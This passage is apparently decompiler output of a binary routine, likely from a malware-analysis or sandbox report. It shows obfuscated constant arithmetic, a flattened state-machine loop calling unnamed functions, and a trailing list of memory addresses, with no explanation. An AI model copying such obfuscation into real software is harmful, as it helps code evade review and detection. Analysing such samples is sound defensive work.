                                                                                                                      				signed int _v204;
                                                                                                                      				signed int _v208;
                                                                                                                      				signed int _v212;
                                                                                                                      				signed int _v216;
                                                                                                                      				signed int _v220;
                                                                                                                      				signed int _v224;
                                                                                                                      				signed int _v228;
                                                                                                                      				signed int _v232;
                                                                                                                      				signed int _v236;
                                                                                                                      				signed int _v240;
                                                                                                                      				signed int _v244;
                                                                                                                      				signed int _v248;
                                                                                                                      				signed int _v252;
                                                                                                                      				signed int _v256;
                                                                                                                      				signed int _v260;
                                                                                                                      				signed int _v264;
                                                                                                                      				signed int _v268;
                                                                                                                      				signed int _v272;
                                                                                                                      				signed int _v276;
                                                                                                                      				signed int _v280;
                                                                                                                      				signed int _v284;
                                                                                                                      				signed int _v288;
                                                                                                                      				signed int _v292;
                                                                                                                      				signed int _v296;
                                                                                                                      				void* __ecx;
                                                                                                                      				void* _t670;
                                                                                                                      				void* _t736;
                                                                                                                      				void* _t738;
                                                                                                                      				void* _t739;
                                                                                                                      				intOrPtr _t745;
                                                                                                                      				void* _t746;
                                                                                                                      				void* _t749;
                                                                                                                      				void* _t759;
                                                                                                                      				void* _t765;
                                                                                                                      				signed int _t772;
                                                                                                                      				signed int _t773;
                                                                                                                      				signed int _t774;
                                                                                                                      				signed int _t775;
                                                                                                                      				signed int _t776;
                                                                                                                      				signed int _t777;
                                                                                                                      				signed int _t778;
                                                                                                                      				signed int _t779;
                                                                                                                      				signed int _t780;
                                                                                                                      				signed int _t781;
                                                                                                                      				signed int _t782;
                                                                                                                      				signed int _t783;
                                                                                                                      				signed int _t784;
                                                                                                                      				signed int _t785;
                                                                                                                      				signed int _t786;
                                                                                                                      				signed int _t787;
                                                                                                                      				signed int _t788;
                                                                                                                      				void* _t789;
                                                                                                                      				void* _t859;
                                                                                                                      				signed int _t876;
                                                                                                                      				void* _t877;
                                                                                                                      				signed int _t879;
                                                                                                                      				void* _t880;
                                                                                                                      				void* _t883;
                                                                                                                      				void* _t884;
                                                                                                                      				void* _t885;
                                                                                                                      				void* _t891;
                                                                                                                      
                                                                                                                      				_push(_a24);
                                                                                                                      				_push(_a20);
                                                                                                                      				_push(0x20);
                                                                                                                      				_push(_a12);
                                                                                                                      				_push(_a8);
                                                                                                                      				_push(_a4);
                                                                                                                      				_push(__edx);
                                                                                                                      				E0017CF25(_t670);
                                                                                                                      				_v276 = 0xaaffe7;
                                                                                                                      				_t885 = _t884 + 0x20;
                                                                                                                      				_t883 = 0;
                                                                                                                      				_t765 = 0x92c7fbc;
                                                                                                                      				_t772 = 0x5f;
                                                                                                                      				_v276 = _v276 * 0x57;
                                                                                                                      				_v276 = _v276 * 0x22;
                                                                                                                      				_v276 = _v276 / _t772;
                                                                                                                      				_v276 = _v276 ^ 0x01ef6b71;
                                                                                                                      				_v80 = 0xefa32d;
                                                                                                                      				_v80 = _v80 + 0x395c;
                                                                                                                      				_v80 = _v80 ^ 0x00efdc89;
                                                                                                                      				_v208 = 0x14a646;
                                                                                                                      				_v208 = _v208 ^ 0x03e947f6;
                                                                                                                      				_t773 = 0x33;
                                                                                                                      				_v208 = _v208 * 7;
                                                                                                                      				_v208 = _v208 >> 7;
                                                                                                                      				_v208 = _v208 ^ 0x0037e257;
                                                                                                                      				_v108 = 0x55608a;
                                                                                                                      				_v108 = _v108 ^ 0x27d6d008;
                                                                                                                      				_v108 = _v108 + 0x510f;
                                                                                                                      				_v108 = _v108 ^ 0x27840191;
                                                                                                                      				_v224 = 0xd82d5c;
                                                                                                                      				_v224 = _v224 | 0x75fffbda;
                                                                                                                      				_v224 = _v224 + 0xb67d;
                                                                                                                      				_v224 = _v224 ^ 0x7600b65b;
                                                                                                                      				_v248 = 0x5f7a1e;
                                                                                                                      				_v248 = _v248 << 2;
                                                                                                                      				_v248 = _v248 / _t773;
                                                                                                                      				_v248 = _v248 << 0xc;
                                                                                                                      				_v248 = _v248 ^ 0x77d07000;
                                                                                                                      				_v28 = 0xb2098a;
                                                                                                                      				_v28 = _v28 ^ 0xa6106b4f;
                                                                                                                      				_v28 = _v28 ^ 0xa6a262c5;
                                                                                                                      				_v288 = 0xdf0886;
                                                                                                                      				_v288 = _v288 ^ 0xb20bba38;
                                                                                                                      				_v288 = _v288 + 0xffff058c;
                                                                                                                      				_t774 = 0x55;
                                                                                                                      				_v288 = _v288 / _t774;
                                                                                                                      				_v288 = _v288 ^ 0x021a95be;
                                                                                                                      				_v40 = 0x709b38;
                                                                                                                      				_v40 = _v40 * 0x4c;
                                                                                                                      				_v40 = _v40 ^ 0x216e14a0;
                                                                                                                      				_v128 = 0x325f64;
                                                                                                                      				_v128 = _v128 | 0xcbf69bed;
                                                                                                                      				_v128 = _v128 ^ 0x5f1c2ec7;
                                                                                                                      				_v128 = _v128 ^ 0x94eaf12a;
                                                                                                                      				_v252 = 0x1f8c2d;
                                                                                                                      				_v252 = _v252 * 0x26;
                                                                                                                      				_v252 = _v252 << 9;
                                                                                                                      				_v252 = _v252 | 0x352a9659;
                                                                                                                      				_v252 = _v252 ^ 0x7dbfde59;
                                                                                                                      				_v52 = 0xb64530;
                                                                                                                      				_v52 = _v52 + 0xffff220f;
                                                                                                                      				_v52 = _v52 ^ 0x00b5673f;
                                                                                                                      				_v88 = 0x1eb517;
                                                                                                                      				_v88 = _v88 + 0x4a10;
                                                                                                                      				_v88 = _v88 ^ 0x00179ba4;
                                                                                                                      				_v152 = 0x6dcdd2;
                                                                                                                      				_v152 = _v152 >> 0xd;
                                                                                                                      				_v152 = _v152 ^ 0x9b988486;
                                                                                                                      				_v152 = _v152 ^ 0x9b92820d;
                                                                                                                      				_v292 = 0x1f7420;
                                                                                                                      				_v292 = _v292 + 0xffff8acf;
                                                                                                                      				_v292 = _v292 + 0xbea;
                                                                                                                      				_v292 = _v292 << 0x10;
                                                                                                                      				_v292 = _v292 ^ 0x0ad85b60;
                                                                                                                      				_v96 = 0xe183f;
                                                                                                                      				_v96 = _v96 + 0xffffe0b5;
                                                                                                                      				_v96 = _v96 ^ 0x0006a2b5;
                                                                                                                      				_v168 = 0xbc531d;
                                                                                                                      				_v168 = _v168 + 0x1044;
                                                                                                                      				_v168 = _v168 << 8;
                                                                                                                      				_v168 = _v168 ^ 0xbc6aad42;
                                                                                                                      				_v48 = 0xac758b;
                                                                                                                      				_t775 = 0xa;
                                                                                                                      				_v48 = _v48 * 0x77;
                                                                                                                      				_v48 = _v48 ^ 0x5023fd0d;
                                                                                                                      				_v236 = 0x67d513;
                                                                                                                      				_v236 = _v236 / _t775;
                                                                                                                      				_v236 = _v236 | 0x579eaf6c;
                                                                                                                      				_v236 = _v236 ^ 0x8e50ee8d;
                                                                                                                      				_v236 = _v236 ^ 0xd9c1be3e;
                                                                                                                      				_v136 = 0xfa6994;
                                                                                                                      				_v136 = _v136 | 0x0e19192c;
                                                                                                                      				_v136 = _v136 >> 8;
                                                                                                                      				_v136 = _v136 ^ 0x000b81a6;
                                                                                                                      				_v104 = 0xfa7815;
                                                                                                                      				_v104 = _v104 + 0xfffffd57;
                                                                                                                      				_v104 = _v104 | 0xf8b7ad9b;
                                                                                                                      				_v104 = _v104 ^ 0xf8f20afa;
                                                                                                                      				_v196 = 0x8e2a42;
                                                                                                                      				_t776 = 0x1d;
                                                                                                                      				_v196 = _v196 / _t776;
                                                                                                                      				_v196 = _v196 + 0xffff8133;
                                                                                                                      				_v196 = _v196 << 4;
                                                                                                                      				_v196 = _v196 ^ 0x00494cf1;
                                                                                                                      				_v284 = 0x1a2960;
                                                                                                                      				_v284 = _v284 << 7;
                                                                                                                      				_v284 = _v284 << 1;
                                                                                                                      				_t777 = 0x7a;
                                                                                                                      				_v284 = _v284 / _t777;
                                                                                                                      				_v284 = _v284 ^ 0x00394215;
                                                                                                                      				_v268 = 0x43d89f;
                                                                                                                      				_v268 = _v268 + 0xffff7f02;
                                                                                                                      				_v268 = _v268 * 0x63;
                                                                                                                      				_v268 = _v268 ^ 0x1173969c;
                                                                                                                      				_v268 = _v268 ^ 0x0b729cb1;
                                                                                                                      				_v228 = 0xa5ecf3;
                                                                                                                      				_v228 = _v228 >> 0xd;
                                                                                                                      				_v228 = _v228 + 0xffff2d40;
                                                                                                                      				_v228 = _v228 + 0xffff09c3;
                                                                                                                      				_v228 = _v228 ^ 0xfffc6095;
                                                                                                                      				_v160 = 0xb4fa1d;
                                                                                                                      				_v160 = _v160 * 0x4b;
                                                                                                                      				_v160 = _v160 >> 0xa;
                                                                                                                      				_v160 = _v160 ^ 0x0003d5ef;
                                                                                                                      				_v36 = 0xfd760e;
                                                                                                                      				_v36 = _v36 | 0xcf12de5e;
                                                                                                                      				_v36 = _v36 ^ 0xcff8d2d3;
                                                                                                                      				_v260 = 0x7426f9;
                                                                                                                      				_v260 = _v260 + 0x2744;
                                                                                                                      				_v260 = _v260 | 0xa7f1812e;
                                                                                                                      				_v260 = _v260 >> 0xc;
                                                                                                                      				_v260 = _v260 ^ 0x0001adb7;
                                                                                                                      				_v204 = 0x2b40b;
                                                                                                                      				_t879 = 0x72;
                                                                                                                      				_v204 = _v204 / _t879;
                                                                                                                      				_t778 = 0xf;
                                                                                                                      				_v204 = _v204 / _t778;
                                                                                                                      				_t779 = 0x79;
                                                                                                                      				_v204 = _v204 * 0x1e;
                                                                                                                      				_v204 = _v204 ^ 0x000520e0;
                                                                                                                      				_v84 = 0xeaa539;
                                                                                                                      				_v84 = _v84 + 0xffff8f42;
                                                                                                                      				_v84 = _v84 ^ 0x00e48483;
                                                                                                                      				_v124 = 0xa185d5;
                                                                                                                      				_v124 = _v124 << 8;
                                                                                                                      				_v124 = _v124 >> 3;
                                                                                                                      				_v124 = _v124 ^ 0x143f3fdc;
                                                                                                                      				_v92 = 0xa97737;
                                                                                                                      				_v92 = _v92 ^ 0xeb9ba296;
                                                                                                                      				_v92 = _v92 ^ 0xeb365c56;
                                                                                                                      				_v132 = 0xbd678a;
                                                                                                                      				_v132 = _v132 + 0x8717;
                                                                                                                      				_v132 = _v132 | 0xacb35e9c;
                                                                                                                      				_v132 = _v132 ^ 0xacb35ba6;
                                                                                                                      				_v68 = 0x976f37;
                                                                                                                      				_v68 = _v68 + 0xffff737a;
                                                                                                                      				_v68 = _v68 ^ 0x00925dc3;
                                                                                                                      				_v200 = 0x3716ae;
                                                                                                                      				_v200 = _v200 * 0x3d;
                                                                                                                      				_v200 = _v200 + 0x7c18;
                                                                                                                      				_v200 = _v200 / _t779;
                                                                                                                      				_v200 = _v200 ^ 0x00164f5a;
                                                                                                                      				_v116 = 0x90307;
                                                                                                                      				_v116 = _v116 + 0xffff7314;
                                                                                                                      				_t780 = 0x73;
                                                                                                                      				_v116 = _v116 / _t780;
                                                                                                                      				_v116 = _v116 ^ 0x000cd282;
                                                                                                                      				_v76 = 0x344fd1;
                                                                                                                      				_v76 = _v76 | 0x7db0f0e8;
                                                                                                                      				_v76 = _v76 ^ 0x7db1d9db;
                                                                                                                      				_v216 = 0x1a88b7;
                                                                                                                      				_v216 = _v216 + 0xffff5c3b;
                                                                                                                      				_v216 = _v216 + 0xffff2820;
                                                                                                                      				_t876 = 9;
                                                                                                                      				_v216 = _v216 / _t876;
                                                                                                                      				_v216 = _v216 ^ 0x000cec9e;
                                                                                                                      				_v100 = 0x3ced92;
                                                                                                                      				_v100 = _v100 + 0xffff1312;
                                                                                                                      				_v100 = _v100 + 0xffffd55c;
                                                                                                                      				_v100 = _v100 ^ 0x00361c3b;
                                                                                                                      				_v184 = 0x789494;
                                                                                                                      				_v184 = _v184 + 0xffff0c7f;
                                                                                                                      				_v184 = _v184 << 1;
                                                                                                                      				_v184 = _v184 | 0x402d3e8e;
                                                                                                                      				_v184 = _v184 ^ 0x40e21003;
                                                                                                                      				_v192 = 0x310378;
                                                                                                                      				_v192 = _v192 << 0xb;
                                                                                                                      				_t781 = 0x22;
                                                                                                                      				_v192 = _v192 * 3;
                                                                                                                      				_v192 = _v192 + 0xffff6836;
                                                                                                                      				_v192 = _v192 ^ 0x985d636a;
                                                                                                                      				_v244 = 0xaa43bf;
                                                                                                                      				_v244 = _v244 / _t879;
                                                                                                                      				_v244 = _v244 << 0xf;
                                                                                                                      				_v244 = _v244 << 0xa;
                                                                                                                      				_v244 = _v244 ^ 0xb200e8c6;
                                                                                                                      				_v188 = 0xd75c86;
                                                                                                                      				_v188 = _v188 << 9;
                                                                                                                      				_v188 = _v188 | 0x025244f6;
                                                                                                                      				_v188 = _v188 * 0x59;
                                                                                                                      				_v188 = _v188 ^ 0xd553b68a;
                                                                                                                      				_v144 = 0x6e01bd;
                                                                                                                      				_v144 = _v144 ^ 0x0f7c0b9c;
                                                                                                                      				_v144 = _v144 / _t781;
                                                                                                                      				_v144 = _v144 ^ 0x007182e2;
                                                                                                                      				_v156 = 0xaeb978;
                                                                                                                      				_t782 = 0x1e;
                                                                                                                      				_v156 = _v156 / _t782;
                                                                                                                      				_v156 = _v156 + 0xffff8ee7;
                                                                                                                      				_v156 = _v156 ^ 0x000c354b;
                                                                                                                      				_v232 = 0x8c6aee;
                                                                                                                      				_v232 = _v232 ^ 0x1b23a9db;
                                                                                                                      				_v232 = _v232 + 0x8ee1;
                                                                                                                      				_v232 = _v232 + 0x44;
                                                                                                                      				_v232 = _v232 ^ 0x1bb20ffb;
                                                                                                                      				_v240 = 0xc4628c;
                                                                                                                      				_v240 = _v240 >> 0xd;
                                                                                                                      				_t783 = 0x6e;
                                                                                                                      				_v240 = _v240 / _t783;
                                                                                                                      				_v240 = _v240 + 0x5eea;
                                                                                                                      				_v240 = _v240 ^ 0x000cb0fe;
                                                                                                                      				_v64 = 0xd4a535;
                                                                                                                      				_v64 = _v64 ^ 0x78f16673;
                                                                                                                      				_v64 = _v64 ^ 0x7824c526;
                                                                                                                      				_v256 = 0x55d7a8;
                                                                                                                      				_v256 = _v256 ^ 0x05430866;
                                                                                                                      				_v256 = _v256 | 0xfffce0d7;
                                                                                                                      				_v256 = _v256 ^ 0xfff12a33;
                                                                                                                      				_v164 = 0xd10b34;
                                                                                                                      				_v164 = _v164 + 0xffffcbea;
                                                                                                                      				_v164 = _v164 + 0xffff01f2;
                                                                                                                      				_v164 = _v164 ^ 0x00ca8dd0;
                                                                                                                      				_v264 = 0x73bd71;
                                                                                                                      				_v264 = _v264 << 0xe;
                                                                                                                      				_v264 = _v264 >> 7;
                                                                                                                      				_v264 = _v264 << 0xa;
                                                                                                                      				_v264 = _v264 ^ 0x7ae6d472;
                                                                                                                      				_v172 = 0xd09f93;
                                                                                                                      				_v172 = _v172 + 0xffffeac5;
                                                                                                                      				_v172 = _v172 << 5;
                                                                                                                      				_v172 = _v172 ^ 0x1a1189dc;
                                                                                                                      				_v272 = 0xce1f77;
                                                                                                                      				_t784 = 0x5f;
                                                                                                                      				_v272 = _v272 / _t784;
                                                                                                                      				_t785 = 0x47;
                                                                                                                      				_v272 = _v272 * 0xd;
                                                                                                                      				_v272 = _v272 << 5;
                                                                                                                      				_v272 = _v272 ^ 0x0388d6fc;
                                                                                                                      				_v72 = 0xd0da8a;
                                                                                                                      				_v72 = _v72 << 3;
                                                                                                                      				_v72 = _v72 ^ 0x068dcd32;
                                                                                                                      				_v280 = 0xa513be;
                                                                                                                      				_v280 = _v280 + 0xffffcd90;
                                                                                                                      				_v280 = _v280 / _t785;
                                                                                                                      				_v280 = _v280 + 0xffffce89;
                                                                                                                      				_v280 = _v280 ^ 0x00081bd8;
                                                                                                                      				_v112 = 0xe9df;
                                                                                                                      				_t786 = 0x11;
                                                                                                                      				_v112 = _v112 * 0xd;
                                                                                                                      				_v112 = _v112 ^ 0xaf5ec247;
                                                                                                                      				_v112 = _v112 ^ 0xaf5aa6d7;
                                                                                                                      				_v180 = 0xdb028a;
                                                                                                                      				_v180 = _v180 * 0x1d;
                                                                                                                      				_v180 = _v180 >> 6;
                                                                                                                      				_v180 = _v180 ^ 0x0069b9f3;
                                                                                                                      				_v220 = 0xee6b4b;
                                                                                                                      				_v220 = _v220 << 3;
                                                                                                                      				_v220 = _v220 | 0xdc702aa0;
                                                                                                                      				_v220 = _v220 + 0x71ee;
                                                                                                                      				_v220 = _v220 ^ 0xdf76f250;
                                                                                                                      				_v296 = 0x23c05a;
                                                                                                                      				_v296 = _v296 * 0x5f;
                                                                                                                      				_v296 = _v296 * 0x36;
                                                                                                                      				_v296 = _v296 + 0xca24;
                                                                                                                      				_v296 = _v296 ^ 0xcc673138;
                                                                                                                      				_v176 = 0x22be9e;
                                                                                                                      				_v176 = _v176 * 0x5d;
                                                                                                                      				_v176 = _v176 >> 0xe;
                                                                                                                      				_v176 = _v176 ^ 0x000fc27c;
                                                                                                                      				_v120 = 0x3d033e;
                                                                                                                      				_v120 = _v120 | 0x1fa14a75;
                                                                                                                      				_v120 = _v120 / _t786;
                                                                                                                      				_v120 = _v120 ^ 0x01d2865b;
                                                                                                                      				_v212 = 0xed5cb5;
                                                                                                                      				_t787 = 0x53;
                                                                                                                      				_v212 = _v212 / _t787;
                                                                                                                      				_v212 = _v212 ^ 0x510fb6d8;
                                                                                                                      				_v212 = _v212 * 0x76;
                                                                                                                      				_v212 = _v212 ^ 0x5c26df9e;
                                                                                                                      				_v32 = 0x743d42;
                                                                                                                      				_v32 = _v32 * 0x19;
                                                                                                                      				_v32 = _v32 ^ 0x0b543fb1;
                                                                                                                      				_v140 = 0xd2e396;
                                                                                                                      				_v140 = _v140 + 0xbc2f;
                                                                                                                      				_v140 = _v140 | 0xffabdfb7;
                                                                                                                      				_v140 = _v140 ^ 0xfffefe2d;
                                                                                                                      				_v56 = 0xb6af07;
                                                                                                                      				_v56 = _v56 | 0x3c719b52;
                                                                                                                      				_v56 = _v56 ^ 0x3cf6fc1e;
                                                                                                                      				_v148 = 0x4e57f8;
                                                                                                                      				_v148 = _v148 / _t876;
                                                                                                                      				_v148 = _v148 << 4;
                                                                                                                      				_v148 = _v148 ^ 0x008180da;
                                                                                                                      				_t880 = 0x8b31915;
                                                                                                                      				_v44 = 0xa59d4d;
                                                                                                                      				_t877 = 0xef66089;
                                                                                                                      				_t788 = 0x2c;
                                                                                                                      				_v44 = _v44 / _t788;
                                                                                                                      				_v44 = _v44 ^ 0x000f19f4;
                                                                                                                      				_v60 = 0x2ad52f;
                                                                                                                      				_v60 = _v60 | 0x792352db;
                                                                                                                      				_v60 = _v60 ^ 0x7927d8fa;
                                                                                                                      				while(1) {
                                                                                                                      					L1:
                                                                                                                      					while(1) {
                                                                                                                      						L2:
                                                                                                                      						_t789 = 0x93fa1a;
                                                                                                                      						while(1) {
                                                                                                                      							L3:
                                                                                                                      							_t859 = 0x2c1be6e;
                                                                                                                      							do {
                                                                                                                      								L4:
                                                                                                                      								_t891 = _t765 - _t880;
                                                                                                                      								if(_t891 > 0) {
                                                                                                                      									__eflags = _t765 - 0x92c7fbc;
                                                                                                                      									if(__eflags == 0) {
                                                                                                                      										_t765 = 0x826e25d;
                                                                                                                      										goto L27;
                                                                                                                      									} else {
                                                                                                                      										__eflags = _t765 - 0xb519ee2;
                                                                                                                      										if(__eflags == 0) {
                                                                                                                      											_push(_v132);
                                                                                                                      											_t654 =  &_v92; // 0xeb365c56
                                                                                                                      											_push( *_t654);
                                                                                                                      											_push(0x171518);
                                                                                                                      											_t759 = E0018FBCF(_v68,  &_v12, _v20, _v200, _v116, _v76, E0017AB66(_v84, _v124, __eflags), _v208, _v216, _v84,  &_v8);
                                                                                                                      											_t885 = _t885 + 0x30;
                                                                                                                      											__eflags = _t759 - _v108;
                                                                                                                      											_t765 =  ==  ? 0x2c1be6e : _t877;
                                                                                                                      											E0017AE03(_v100, _v184, _v192, _t757);
                                                                                                                      											goto L25;
                                                                                                                      										} else {
                                                                                                                      											__eflags = _t765 - 0xcf70aca;
                                                                                                                      											if(_t765 == 0xcf70aca) {
                                                                                                                      												E001768DE(_v32, _v140, _v56, _v148, _v16);
                                                                                                                      												_t885 = _t885 + 0xc;
                                                                                                                      												_t765 = _t877;
                                                                                                                      												goto L1;
                                                                                                                      											} else {
                                                                                                                      												__eflags = _t765 - _t877;
                                                                                                                      												if(__eflags != 0) {
                                                                                                                      													goto L27;
                                                                                                                      												} else {
                                                                                                                      													E00177027(_v44, _v52, _v20, _v60);
                                                                                                                      												}
                                                                                                                      											}
                                                                                                                      										}
                                                                                                                      									}
                                                                                                                      								} else {
                                                                                                                      									if(_t891 == 0) {
                                                                                                                      										_t736 = E00183B45(_v224, _v156, _v232, _v240, _v64, _v248, _v12, _v256, _v16, _v20, _t789, _v164,  &_v24, _v264);
                                                                                                                      										_t885 = _t885 + 0x30;
                                                                                                                      										__eflags = _t736 - _v28;
                                                                                                                      										_t789 = 0x93fa1a;
                                                                                                                      										_t738 = 0x70434dd;
                                                                                                                      										_t765 =  ==  ? 0x93fa1a : 0xcf70aca;
                                                                                                                      										goto L3;
                                                                                                                      									} else {
                                                                                                                      										if(_t765 == _t789) {
                                                                                                                      											_t739 = E0017BA16(_a24, _v172, _v24, _v272, _v72, _v280, _a20, _v288);
                                                                                                                      											_t885 = _t885 + 0x18;
                                                                                                                      											__eflags = _t739 - _v40;
                                                                                                                      											_t738 = 0x70434dd;
                                                                                                                      											_t765 =  ==  ? 0x70434dd : 0x275f79a;
                                                                                                                      											goto L2;
                                                                                                                      										} else {
                                                                                                                      											if(_t765 == 0x275f79a) {
                                                                                                                      												E0017E723(_v296, _v176, _v24, _v120, _v212);
                                                                                                                      												_t885 = _t885 + 0xc;
                                                                                                                      												_t765 = 0xcf70aca;
                                                                                                                      												while(1) {
                                                                                                                      													L1:
                                                                                                                      													goto L2;
                                                                                                                      												}
                                                                                                                      											} else {
                                                                                                                      												if(_t765 == _t859) {
                                                                                                                      													_push(_t789);
                                                                                                                      													_push(_t789);
                                                                                                                      													_t745 = E00183512(_v12);
                                                                                                                      													__eflags = _t745;
                                                                                                                      													_v16 = _t745;
                                                                                                                      													_t765 =  !=  ? _t880 : _t877;
                                                                                                                      													while(1) {
                                                                                                                      														L1:
                                                                                                                      														goto L2;
                                                                                                                      													}
                                                                                                                      												} else {
                                                                                                                      													if(_t765 == _t738) {
                                                                                                                      														_t746 = E0018FDA3(_v112, _a8, _v180, _v24, _v220, _v128, 0x20);
                                                                                                                      														_t885 = _t885 + 0x14;
                                                                                                                      														_t765 = 0x275f79a;
                                                                                                                      														__eflags = _t746 - _v252;
                                                                                                                      														_t883 =  ==  ? 1 : _t883;
                                                                                                                      														while(1) {
                                                                                                                      															L1:
                                                                                                                      															L2:
                                                                                                                      															_t789 = 0x93fa1a;
                                                                                                                      															L3:
                                                                                                                      															_t859 = 0x2c1be6e;
                                                                                                                      															goto L4;
                                                                                                                      														}
                                                                                                                      													} else {
                                                                                                                      														_t896 = _t765 - 0x826e25d;
                                                                                                                      														if(_t765 == 0x826e25d) {
                                                                                                                      															_push(_v96);
                                                                                                                      															_push(_v292);
                                                                                                                      															_push(0x171568);
                                                                                                                      															_t749 = E0017AB66(_v88, _v152, _t896);
                                                                                                                      															_push(_v136);
                                                                                                                      															_push(_v236);
                                                                                                                      															_push(0x171538);
                                                                                                                      															E00180EDA(E0017AB66(_v168, _v48, _t896), _v276, _v104, _t749,  &_v20, _v196, _v284);
                                                                                                                      															_t765 =  ==  ? 0xb519ee2 : 0x7228e80;
                                                                                                                      															E0017AE03(_v268, _v228, _v160, _t749);
                                                                                                                      															E0017AE03(_v36, _v260, _v204, _t750);
                                                                                                                      															_t885 = _t885 + 0x3c;
                                                                                                                      															_t877 = 0xef66089;
                                                                                                                      															L25:
                                                                                                                      															_t880 = 0x8b31915;
                                                                                                                      															_t738 = 0x70434dd;
                                                                                                                      															_t789 = 0x93fa1a;
                                                                                                                      															_t859 = 0x2c1be6e;
                                                                                                                      														}
                                                                                                                      														goto L27;
                                                                                                                      													}
                                                                                                                      												}
                                                                                                                      											}
                                                                                                                      										}
                                                                                                                      									}
                                                                                                                      								}
                                                                                                                      								L22:
                                                                                                                      								return _t883;
                                                                                                                      								L27:
                                                                                                                      							} while (_t765 != 0x7228e80);
                                                                                                                      							goto L22;
                                                                                                                      						}
                                                                                                                      					}
                                                                                                                      				}
                                                                                                                      			}

                                                                                                                      0x001818a6
                                                                                                                      0x001818b1
                                                                                                                      0x001818bc
                                                                                                                      0x001818c7
                                                                                                                      0x001818cf
                                                                                                                      0x001818dc
                                                                                                                      0x001818df
                                                                                                                      0x001818e3
                                                                                                                      0x001818e8
                                                                                                                      0x001818f0
                                                                                                                      0x001818fb
                                                                                                                      0x00181906
                                                                                                                      0x00181911
                                                                                                                      0x0018191c
                                                                                                                      0x00181924
                                                                                                                      0x0018192c
                                                                                                                      0x00181934
                                                                                                                      0x0018193c
                                                                                                                      0x00181944
                                                                                                                      0x00181951
                                                                                                                      0x00181955
                                                                                                                      0x0018195a
                                                                                                                      0x00181962
                                                                                                                      0x0018196d
                                                                                                                      0x00181978
                                                                                                                      0x00181983
                                                                                                                      0x0018198b
                                                                                                                      0x00181993
                                                                                                                      0x0018199f
                                                                                                                      0x001819a2
                                                                                                                      0x001819a6
                                                                                                                      0x001819ae
                                                                                                                      0x001819c1
                                                                                                                      0x001819c8
                                                                                                                      0x001819d3
                                                                                                                      0x001819de
                                                                                                                      0x001819e9
                                                                                                                      0x001819f4
                                                                                                                      0x001819ff
                                                                                                                      0x00181a0c
                                                                                                                      0x00181a10
                                                                                                                      0x00181a15
                                                                                                                      0x00181a1d
                                                                                                                      0x00181a27
                                                                                                                      0x00181a32
                                                                                                                      0x00181a3d
                                                                                                                      0x00181a48
                                                                                                                      0x00181a53
                                                                                                                      0x00181a5e
                                                                                                                      0x00181a69
                                                                                                                      0x00181a74
                                                                                                                      0x00181a7c
                                                                                                                      0x00181a87
                                                                                                                      0x00181a92
                                                                                                                      0x00181a9a
                                                                                                                      0x00181aa2
                                                                                                                      0x00181aaa
                                                                                                                      0x00181aaf
                                                                                                                      0x00181ab7
                                                                                                                      0x00181ac2
                                                                                                                      0x00181acd
                                                                                                                      0x00181ad8
                                                                                                                      0x00181ae3
                                                                                                                      0x00181aee
                                                                                                                      0x00181af6
                                                                                                                      0x00181b01
                                                                                                                      0x00181b16
                                                                                                                      0x00181b19
                                                                                                                      0x00181b20
                                                                                                                      0x00181b2b
                                                                                                                      0x00181b3b
                                                                                                                      0x00181b3f
                                                                                                                      0x00181b47
                                                                                                                      0x00181b4f
                                                                                                                      0x00181b57
                                                                                                                      0x00181b62
                                                                                                                      0x00181b6d
                                                                                                                      0x00181b75
                                                                                                                      0x00181b80
                                                                                                                      0x00181b8b
                                                                                                                      0x00181b96
                                                                                                                      0x00181ba1
                                                                                                                      0x00181bac
                                                                                                                      0x00181bb8
                                                                                                                      0x00181bbd
                                                                                                                      0x00181bc3
                                                                                                                      0x00181bcb
                                                                                                                      0x00181bd0
                                                                                                                      0x00181bd8
                                                                                                                      0x00181be0
                                                                                                                      0x00181be5
                                                                                                                      0x00181bed
                                                                                                                      0x00181bf0
                                                                                                                      0x00181bf4
                                                                                                                      0x00181bfc
                                                                                                                      0x00181c04
                                                                                                                      0x00181c11
                                                                                                                      0x00181c15
                                                                                                                      0x00181c1d
                                                                                                                      0x00181c25
                                                                                                                      0x00181c2d
                                                                                                                      0x00181c32
                                                                                                                      0x00181c3a
                                                                                                                      0x00181c42
                                                                                                                      0x00181c4a
                                                                                                                      0x00181c5d
                                                                                                                      0x00181c64
                                                                                                                      0x00181c6c
                                                                                                                      0x00181c77
                                                                                                                      0x00181c84
                                                                                                                      0x00181c8f
                                                                                                                      0x00181c9a
                                                                                                                      0x00181ca2
                                                                                                                      0x00181caa
                                                                                                                      0x00181cb2
                                                                                                                      0x00181cb7
                                                                                                                      0x00181cbf
                                                                                                                      0x00181ccd
                                                                                                                      0x00181cd2
                                                                                                                      0x00181cdc
                                                                                                                      0x00181ce1
                                                                                                                      0x00181cec
                                                                                                                      0x00181cef
                                                                                                                      0x00181cf3
                                                                                                                      0x00181cfb
                                                                                                                      0x00181d06
                                                                                                                      0x00181d11
                                                                                                                      0x00181d1c
                                                                                                                      0x00181d27
                                                                                                                      0x00181d2f
                                                                                                                      0x00181d37
                                                                                                                      0x00181d42
                                                                                                                      0x00181d4d
                                                                                                                      0x00181d58
                                                                                                                      0x00181d63
                                                                                                                      0x00181d6e
                                                                                                                      0x00181d79
                                                                                                                      0x00181d84
                                                                                                                      0x00181d8f
                                                                                                                      0x00181d9a
                                                                                                                      0x00181da5
                                                                                                                      0x00181db0
                                                                                                                      0x00181dbd
                                                                                                                      0x00181dc1
                                                                                                                      0x00181dd1
                                                                                                                      0x00181dd5
                                                                                                                      0x00181ddd
                                                                                                                      0x00181de8
                                                                                                                      0x00181dfa
                                                                                                                      0x00181dff
                                                                                                                      0x00181e08
                                                                                                                      0x00181e13
                                                                                                                      0x00181e1e
                                                                                                                      0x00181e29
                                                                                                                      0x00181e34
                                                                                                                      0x00181e3c
                                                                                                                      0x00181e44
                                                                                                                      0x00181e50
                                                                                                                      0x00181e53
                                                                                                                      0x00181e57
                                                                                                                      0x00181e5f
                                                                                                                      0x00181e6a
                                                                                                                      0x00181e75
                                                                                                                      0x00181e80
                                                                                                                      0x00181e8b
                                                                                                                      0x00181e96
                                                                                                                      0x00181ea1
                                                                                                                      0x00181ea8
                                                                                                                      0x00181eb5
                                                                                                                      0x00181ec0
                                                                                                                      0x00181ec8
                                                                                                                      0x00181ed4
                                                                                                                      0x00181ed7
                                                                                                                      0x00181ede
                                                                                                                      0x00181ee9
                                                                                                                      0x00181ef4
                                                                                                                      0x00181f04
                                                                                                                      0x00181f08
                                                                                                                      0x00181f0d
                                                                                                                      0x00181f12
                                                                                                                      0x00181f1a
                                                                                                                      0x00181f25
                                                                                                                      0x00181f2d
                                                                                                                      0x00181f40
                                                                                                                      0x00181f47
